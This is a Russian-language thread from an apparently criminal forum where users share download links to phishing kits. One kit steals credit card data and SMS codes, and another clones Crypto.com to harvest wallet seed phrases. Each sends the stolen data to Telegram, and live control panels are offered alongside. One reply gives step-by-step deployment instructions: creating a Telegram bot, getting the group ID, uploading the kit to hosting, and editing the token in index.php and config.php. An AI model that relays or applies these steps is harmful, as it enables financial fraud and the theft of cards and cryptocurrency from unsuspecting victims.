Пожалуйста, обратите внимание, что пользователь заблокирован
На безвозмездной основе буду скидывать сюда исходники фиш ( сс, крипта) и парочка лайв панелей. кто возьмет благодарочку оставьте)))
можно, пожалуйста, мини гайд, где что нужно менять, в каком файле?фиш для получения сс смс. с отправкой в тг.
shellgift.zip - AnonFiles
anonfiles.com
а сам что никак посмотреть пару файлов, где что прописывается!!!можно, пожалуйста, мини гайд, где что нужно менять, в каком файле?
Создаем бота в тг через @botfather и добавляем его в группу которую тоже создаем после этого добавляем в группу еще 1 бота @myidbot и прописываем команду /getgroupid и узнаем ид группы (у нас есть токен и группы ид) заливаем содержимое архива на хостинг и в index.php в самом начале сайта заходим и меняем данные токена на свои ,так-же файле config.php делаем тоже самое , и все готово к работе можно проверять.можно, пожалуйста, мини гайд, где что нужно менять
я с фишами не работал, а тут бесплатно скинули, можно попробовать полить для разнообразия.а спросил, потому что мог бы что-то где-то пропустить.мы же люди, мы коммуницируем и учимся друг у друга.а сам что никак посмотреть пару файлов, где что прописывается!!!
А так купи в соседних темах под себя скрипт, тебе все установят и распишут!!!
Ты о чем? какая желчь? там все два файла где нужно прописать данные и поверь если бы ты их посмотрел, то сразу бы все понял, а ты как понимаю скачал и сразу спросил, не посмотрев что внутри!я с фишами не работал, а тут бесплатно скинули, можно попробовать полить для разнообразия.а спросил, потому что мог бы что-то где-то пропустить.мы же люди, мы коммуницируем и учимся друг у друга.
да и вопрос не тебе адресовался.желчь оставь в своем желчном пузыре.
я увидел эти 2 файла, но помимо них есть и другие.может где-то в каком-то .js или еще где-то тоже что-то нужно было поменять.еще раз повторяю, до этого не работал и спросил у автора.он мог ответить, а мог и не ответить, никто никого не заставляет, обычная вежливая просьба была.то что там всего 2 файла поменять нужно понятно тебе, уже работавшим с этими вещами, но не мне.Ты о чем? какая желчь? там все два файла где нужно прописать данные и поверь если бы ты их посмотрел, то сразу бы все понял, а ты как понимаю скачал и сразу спросил, не посмотрев что внутри!
Внесу небольшую поправку. Я не автор, но все эти инструменты были у нас в работе. чуть позже скинем еще фиш криптокома по сидам. тоже отправка в тг. также скинем лайв панель под сс ( веб морда) ну и страницы к ним. не сказать что отработка. но пойдет для начинающих ребят. Кто захочет, тот отблагодарит)))я увидел эти 2 файла, но помимо них есть и другие.может где-то в каком-то .js или еще где-то тоже что-то нужно было поменять.еще раз повторяю, до этого не работал и спросил у автора.он мог ответить, а мог и не ответить, никто никого не заставляет, обычная вежливая просьба была.то что там всего 2 файла поменять нужно понятно тебе, уже работавшим с этими вещами, но не мне.
Это тот, что за 200 бачинских тут кто то продать пытался намедни?)фиш для получения сс смс. с отправкой в тг.
shellgift.zip - AnonFiles
anonfiles.com
да все верно. мы поработали. результат не очень. верстка хромает, но кто умеет тот пофиксит. Так как мы купили , это является нашей собственностью и мы решили выложить нуждающимся. это не противоречит условия и правилам форума. а также данная позиция не была оглашена ТС. Поэтому пользуйтесь господа.Это тот, что за 200 бачинских тут кто то продать пытался намедни?)
https://anonfiles.com/tb8d64say7/Source2_rar данные сорцы были приобретены на соседнем борде, нам они не подошли. у кого руки прямые тот поправит. кто захочет тот отблагодарит. Лайв панель кстатиВнесу небольшую поправку. Я не автор, но все эти инструменты были у нас в работе. чуть позже скинем еще фиш криптокома по сидам. тоже отправка в тг. также скинем лайв панель под сс ( веб морда) ну и страницы к ним. не сказать что отработка. но пойдет для начинающих ребят. Кто захочет, тот отблагодарит)))
Получается…остаётся только лить ?))https://anonfiles.com/X7E6Ren6y8/_zip
вот и обещанный крипто ком. сбор сид фраз. все скопировано , по большей части вручную. от оригинала практически не отличается. вырезаный ненужные блоки, убрали переходы плэймаркет и апсторе. добавлен лайф чат, отправка сидов в тг. рега только по коду. ( код вручную с корп мыла отправляете ( в исходнике увидите его) если не увидите напишите тут я скину. лк также работает. пользуйтесь))
да)Получается…остаётся только лить ?))
не работает )https://anonfiles.com/tb8d64say7/Source2_rar данные сорцы были приобретены на соседнем борде, нам они не подошли. у кого руки прямые тот поправит. кто захочет тот отблагодарит. Лайв панель кстати